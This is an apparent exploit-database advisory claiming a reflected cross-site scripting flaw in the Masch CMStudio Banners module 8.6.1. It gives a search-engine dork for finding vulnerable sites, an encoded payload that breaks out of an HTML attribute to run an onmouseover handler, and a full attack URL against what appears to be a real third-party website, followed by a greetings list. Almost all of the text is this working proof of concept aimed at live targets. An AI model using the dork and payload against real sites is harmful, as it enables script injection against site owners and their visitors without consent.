====================================================================================================================================
| # Title : Masch CMStudio Banners Modules 8.6.1 XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) |
| # Vendor : https://masch.com/en-us/home/ |
| # Dork : "bannergo.php inurl:/modules/banners/" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use Payload : /templates/mom-2-rows" onmouseover%3dprompt(912625) bad%3d"
[+] http://www.chalet-talisman.ch/templates/mom-2-rows%22%20onmouseover%3dprompt(912625)%20bad%3d%22
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================